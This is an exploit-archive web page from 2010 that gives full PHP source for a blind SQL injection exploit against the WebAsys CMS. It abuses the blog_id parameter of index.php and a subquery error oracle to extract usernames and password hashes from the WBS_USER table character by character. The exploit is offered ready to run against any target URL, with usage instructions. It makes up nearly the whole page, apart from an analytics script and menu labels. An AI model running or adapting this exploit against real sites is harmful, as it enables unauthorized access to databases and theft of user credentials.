Home / os / win7

WebAsys blind SQL Injection Exploit

Posted on 24 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>WebAsys blind SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================
WebAsys blind SQL Injection Exploit
===================================

&lt;?php
/**
 * WebAsys blindSQL-inj exploit
 * @author: zsh.shell
 */
 
if($argc !== 4) {
 echo &quot;#######################################

&quot;;
 echo &quot;GET username by id:	php &quot;.$argv[0].&quot; url id u
&quot;;
 echo &quot;GET password by id:	php &quot;.$argv[0].&quot; url id p
&quot;;
 echo &quot;
Example: php &quot;.$argv[0].&quot; http://site.com/ 1 p

&quot;;
 die(&quot;#######################################
&quot;);
}
$url = $argv[1].&quot;index.php?ukey=news&amp;blog_id=&quot;;
$id = $argv[2];
$me = $argv[3];
if($me == 'u') {
        $me = &quot;lower(U_ID)&quot;;
        $chars = Array(0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z);
 
    for($i=1;$i&lt;=25;$i++) {
        $vuln = $url.&quot;if((select+length(U_ID)+FROM+WBS_USER+where+C_ID=1)=&quot;.$i.&quot;,1,(select+1+union+select+2))&quot;;
        $result = file_get_contents($vuln);
        if(!preg_match(&quot;/Subquery returns/&quot;, $result)) {
            $much = $i;
            break;
        }
     }
}
elseif($me == 'p') {
    $me = &quot;U_PASSWORD&quot;;
    $chars = Array(0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f);
    $much = 32;
}
else die(&quot;Wrong exploit parametr&quot;. $me .&quot;
&quot;);
 
$chars = array_map(&quot;ord&quot;, $chars);
 
 
for($i=1;$i&lt;=$much;$i++)
    foreach($chars as $j) {
        for($k=0;$k&lt;=strlen($out);$k++) echo chr(8);
        $vuln = $url.&quot;if(ascii(substring((select+&quot;.$me.&quot;+from+WBS_USER+where+C_ID=&quot;.$id.&quot;),&quot;.$i.&quot;,1))=&quot;.$j.&quot;,1,(select+1+union+select+2))&quot;;
        $result = file_get_contents($vuln);
        $out = &quot;[&quot;.chr($j).&quot;] :&gt; &quot;.$res;
         
        if(!preg_match(&quot;/Subquery returns/&quot;, $result)) {
            $res .= chr($j);
            break;
        }
        echo $out;
    }
if(substr(strtolower(PHP_OS),0,3) == 'win') system(&quot;cls&quot;); else system(&quot;clear&quot;);
echo &quot;[+] Result:	&quot;.$res.&quot;
&quot;;
?&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-24]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :